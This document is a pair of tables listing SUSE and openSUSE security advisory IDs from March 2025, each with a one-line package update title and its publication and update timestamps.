Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
suse-su-2025:1032-1	Security update for microcode_ctl	2025-03-26T14:22:25Z	2025-03-26T14:22:25Z
suse-su-2025:1029-1	Security update for ed25519-java	2025-03-26T13:11:18Z	2025-03-26T13:11:18Z
suse-su-2025:1028-1	Security update for proftpd	2025-03-26T12:50:07Z	2025-03-26T12:50:07Z
suse-su-2025:1027-1	Security update for the Linux Kernel	2025-03-26T12:12:05Z	2025-03-26T12:12:05Z
suse-su-2025:1026-1	Security update for php7	2025-03-26T11:30:47Z	2025-03-26T11:30:47Z
suse-su-2025:1025-1	Security update for php7	2025-03-26T11:30:00Z	2025-03-26T11:30:00Z
suse-su-2025:1024-1	Security update for tomcat10	2025-03-26T11:29:12Z	2025-03-26T11:29:12Z
suse-su-2025:1023-1	Security update for webkit2gtk3	2025-03-26T11:28:46Z	2025-03-26T11:28:46Z
suse-su-2025:1022-1	Security update for apache-commons-vfs2	2025-03-26T11:28:34Z	2025-03-26T11:28:34Z
suse-su-2025:1019-1	Security update for azure-cli-core	2025-03-26T10:27:40Z	2025-03-26T10:27:40Z
suse-su-2025:1018-1	Security update for buildah	2025-03-26T09:03:07Z	2025-03-26T09:03:07Z
suse-su-2025:1017-1	Security update for buildah	2025-03-26T09:02:54Z	2025-03-26T09:02:54Z
suse-su-2025:1014-1	Security update for buildah	2025-03-25T13:05:55Z	2025-03-25T13:05:55Z
suse-su-2025:1013-1	Security update for govulncheck-vulndb	2025-03-25T12:47:48Z	2025-03-25T12:47:48Z
suse-su-2025:1012-1	Security update for php8	2025-03-25T12:47:30Z	2025-03-25T12:47:30Z
suse-su-2025:1011-1	Security update for grafana	2025-03-25T11:44:29Z	2025-03-25T11:44:29Z
suse-su-2025:1010-1	Security update for grafana	2025-03-25T11:44:15Z	2025-03-25T11:44:15Z
suse-su-2025:1009-1	Security update for grafana	2025-03-25T11:44:03Z	2025-03-25T11:44:03Z
suse-su-2025:1008-1	Security update for python-gunicorn	2025-03-25T11:09:00Z	2025-03-25T11:09:00Z
suse-su-2025:1007-1	Security update for helm	2025-03-25T08:44:44Z	2025-03-25T08:44:44Z
suse-su-2025:1006-1	Security update for google-osconfig-agent	2025-03-25T08:44:10Z	2025-03-25T08:44:10Z
suse-su-2025:1005-1	Security update for google-guest-agent	2025-03-25T08:43:34Z	2025-03-25T08:43:34Z
suse-su-2025:1004-1	Security update for python-Jinja2	2025-03-25T08:42:43Z	2025-03-25T08:42:43Z
suse-su-2025:1003-1	Security update for libxslt	2025-03-25T08:42:08Z	2025-03-25T08:42:08Z
suse-su-2025:1002-1	Security update for python-gunicorn	2025-03-25T08:41:39Z	2025-03-25T08:41:39Z
suse-su-2025:0998-1	Security update for freetype2	2025-03-25T02:07:21Z	2025-03-25T02:07:21Z
suse-su-2025:0994-1	Security update for php8	2025-03-24T15:11:07Z	2025-03-24T15:11:07Z
suse-su-2025:0993-1	Security update for webkit2gtk3	2025-03-24T14:33:32Z	2025-03-24T14:33:32Z
suse-su-2025:0992-1	Security update for docker	2025-03-24T14:31:39Z	2025-03-24T14:31:39Z
suse-su-2025:0991-1	Security update for rsync	2025-03-24T13:56:41Z	2025-03-24T13:56:41Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
opensuse-su-2025:14932-1	qubesome-0.0.10-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14931-1	icingacli-2.12.4-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14930-1	git-bug-0.8.0+git.1742269202.0ab94c9-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14929-1	apache-commons-vfs2-2.10.0-1.1 on GA media	2025-03-26T00:00:00Z	2025-03-26T00:00:00Z
opensuse-su-2025:14928-1	libmbedcrypto7-2.28.10-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14927-1	kubernetes1.32-apiserver-1.32.3-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14926-1	kubernetes1.31-apiserver-1.31.7-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14925-1	kubernetes1.30-apiserver-1.30.11-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14924-1	kubernetes1.29-apiserver-1.29.15-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14923-1	docker-stable-24.0.9_ce-8.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14922-1	chromedriver-134.0.6998.117-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:14921-1	argocd-cli-2.14.8-1.1 on GA media	2025-03-25T00:00:00Z	2025-03-25T00:00:00Z
opensuse-su-2025:0103-1	Security update for cadvisor	2025-03-24T17:01:45Z	2025-03-24T17:01:45Z
opensuse-su-2025:14920-1	gitleaks-8.24.2-1.1 on GA media	2025-03-24T00:00:00Z	2025-03-24T00:00:00Z
opensuse-su-2025:14919-1	forgejo-10.0.3-1.1 on GA media	2025-03-24T00:00:00Z	2025-03-24T00:00:00Z
opensuse-su-2025:0101-1	Security update for radare2	2025-03-23T15:01:53Z	2025-03-23T15:01:53Z
opensuse-su-2025:0098-1	Security update for chromium	2025-03-22T10:55:25Z	2025-03-22T10:55:25Z
opensuse-su-2025:14918-1	warewulf4-4.6.0-2.1 on GA media	2025-03-21T00:00:00Z	2025-03-21T00:00:00Z
opensuse-su-2025:14917-1	nodejs-electron-33.4.6-1.1 on GA media	2025-03-21T00:00:00Z	2025-03-21T00:00:00Z
opensuse-su-2025:0094-1	Security update for gitea-tea	2025-03-20T13:01:19Z	2025-03-20T13:01:19Z
opensuse-su-2025:14916-1	xorg-x11-server-21.1.15-3.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14915-1	tomcat10-10.1.39-1.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14914-1	python311-joblib-1.4.2-2.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14913-1	python311-Django-5.1.7-1.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14912-1	mercurial-6.9.4-1.1 on GA media	2025-03-20T00:00:00Z	2025-03-20T00:00:00Z
opensuse-su-2025:14911-1	tomcat-9.0.102-1.1 on GA media	2025-03-19T00:00:00Z	2025-03-19T00:00:00Z
opensuse-su-2025:14910-1	govulncheck-vulndb-0.0.20250318T181448-1.1 on GA media	2025-03-19T00:00:00Z	2025-03-19T00:00:00Z
opensuse-su-2025:14909-1	apptainer-1.3.6-5.1 on GA media	2025-03-19T00:00:00Z	2025-03-19T00:00:00Z
opensuse-su-2025:14908-1	python311-Django4-4.2.20-1.1 on GA media	2025-03-18T00:00:00Z	2025-03-18T00:00:00Z
opensuse-su-2025:14907-1	kured-1.17.1-1.1 on GA media	2025-03-18T00:00:00Z	2025-03-18T00:00:00Z